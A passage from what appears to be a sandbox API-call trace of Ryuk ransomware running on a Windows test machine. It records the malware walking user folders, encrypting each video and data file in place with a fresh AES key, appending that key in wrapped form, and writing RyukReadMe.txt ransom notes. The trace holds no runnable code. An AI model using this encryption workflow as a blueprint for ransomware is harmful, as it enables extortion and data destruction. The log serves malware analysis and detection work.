lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.382] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x146ab, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x146ab, lpOverlapped=0x0) returned 1 [0159.383] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0159.383] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x146ab, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x146b0) returned 1 [0159.384] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.384] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x146b0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x146b0, lpOverlapped=0x0) returned 1 [0159.384] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0159.384] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0159.384] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0159.384] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0159.384] CloseHandle (hObject=0x190) returned 1 [0159.399] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.403] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.403] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.403] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.403] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.404] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\YamAyURZk.mp4", dwFileAttributes=0x80) returned 1 [0159.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\YamAyURZk.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\yamayurzk.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.404] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=71563) returned 1 [0159.404] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=71563) returned 1 [0159.404] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x11669, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.404] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0159.405] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.405] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0159.405] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.405] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.405] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1178b, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x1178b, lpOverlapped=0x0) returned 1 [0159.406] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0159.406] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1178b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x11790) returned 1 [0159.406] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.407] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11790, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x11790, lpOverlapped=0x0) returned 1 [0159.407] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0159.407] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0159.407] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0159.407] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0159.407] CloseHandle (hObject=0x190) returned 1 [0159.432] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.436] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.436] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.436] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.436] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.436] SetLastError (dwErrCode=0x0) [0159.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.436] GetLastError () returned 0xb7 [0159.436] CloseHandle (hObject=0x18c) returned 1 [0159.436] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.436] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.436] SetLastError (dwErrCode=0x0) [0159.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.436] GetLastError () returned 0xb7 [0159.436] CloseHandle (hObject=0x188) returned 1 [0159.436] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.436] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.436] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.437] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UBdG7.flv", dwFileAttributes=0x80) returned 1 [0159.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\UBdG7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ubdg7.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.437] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=78565) returned 1 [0159.437] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=78565) returned 1 [0159.437] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x131c3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.437] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0159.438] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.438] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0159.438] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.438] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.438] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x132e5, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x132e5, lpOverlapped=0x0) returned 1 [0159.439] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0159.439] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x132e5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x132f0) returned 1 [0159.440] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.440] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x132f0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x132f0, lpOverlapped=0x0) returned 1 [0159.440] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0159.440] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0159.440] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0159.440] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0159.440] CloseHandle (hObject=0x188) returned 1 [0159.455] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.459] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.459] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.459] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.459] SetLastError (dwErrCode=0x0) [0159.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.460] GetLastError () returned 0xb7 [0159.460] CloseHandle (hObject=0x188) returned 1 [0159.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZrI8QzfuLZdA6NFK\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.460] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.460] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.460] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.460] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZrI8QzfuLZdA6NFK\\sY0iN.mkv", dwFileAttributes=0x80) returned 1 [0159.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZrI8QzfuLZdA6NFK\\sY0iN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zri8qzfulzda6nfk\\sy0in.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.460] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=85154) returned 1 [0159.460] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=85154) returned 1 [0159.461] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x14b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.461] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0159.461] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.461] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0159.461] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0159.462] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.462] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x14ca2, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x14ca2, lpOverlapped=0x0) returned 1 [0159.463] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0159.463] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x14ca2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x14cb0) returned 1 [0159.463] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.463] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14cb0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x14cb0, lpOverlapped=0x0) returned 1 [0159.464] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0159.464] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0159.464] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0159.464] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0159.464] CloseHandle (hObject=0x18c) returned 1 [0159.486] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.490] CryptDestroyKey (hKey=0x3b8690) returned 1 [0159.490] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.490] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.490] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.490] SetLastError (dwErrCode=0x0) [0159.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ZrI8QzfuLZdA6NFK\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\zri8qzfulzda6nfk\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.490] GetLastError () returned 0x0 [0159.490] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0159.491] CloseHandle (hObject=0x188) returned 1 [0159.491] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0159.491] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.491] SetLastError (dwErrCode=0x0) [0159.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.492] GetLastError () returned 0xb7 [0159.492] CloseHandle (hObject=0x184) returned 1 [0159.492] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0159.492] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0159.492] SetLastError (dwErrCode=0x0) [0159.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0159.492] GetLastError () returned 0xb7 [0159.492] CloseHandle (hObject=0x180) returned 1 [0159.492] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0159.492] SetLastError (dwErrCode=0x0) [0159.492] CreateFileW (lpFileName="C:\\Users\\RyukReadMe.txt" (normalized: "c:\\users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.492] GetLastError () returned 0x5 [0159.492] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0159.492] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.492] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0159.492] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.492] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.492] SetLastError (dwErrCode=0x0) [0159.492] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.493] GetLastError () returned 0xb7 [0159.493] CloseHandle (hObject=0x184) returned 1 [0159.493] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.493] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.493] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.493] SetLastError (dwErrCode=0x0) [0159.493] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.493] GetLastError () returned 0xb7 [0159.493] CloseHandle (hObject=0x188) returned 1 [0159.493] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.493] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.493] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.493] SetLastError (dwErrCode=0x0) [0159.493] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.493] GetLastError () returned 0xb7 [0159.493] CloseHandle (hObject=0x18c) returned 1 [0159.493] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.494] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.494] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.494] SetLastError (dwErrCode=0x0) [0159.494] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.494] GetLastError () returned 0xb7 [0159.494] CloseHandle (hObject=0x190) returned 1 [0159.494] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.494] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.494] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.494] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.494] SetLastError (dwErrCode=0x0) [0159.494] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.494] GetLastError () returned 0xb7 [0159.494] CloseHandle (hObject=0xe4) returned 1 [0159.494] FindFirstFileW (in: lpFileName="C:\\Users\\All 